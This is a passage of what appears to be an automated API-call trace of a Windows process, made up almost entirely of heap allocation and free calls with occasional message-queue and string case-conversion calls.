hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.588] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0087.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0087.610] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0087.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.611] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.612] CharLowerBuffW (in: lpsz="byte[57928]", cchLength=0xb | out: lpsz="byte[57928]") returned 0xb [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe248) returned 0x37c0048 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69970 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0087.613] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69bb0 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x37ce298 [0087.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe243) returned 0x37dc4e8 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69bb0 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37ce298 | out: hHeap=0x2af0000) returned 1 [0087.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37dc4e8 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.617] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.617] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.617] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0087.618] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0087.618] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.619] 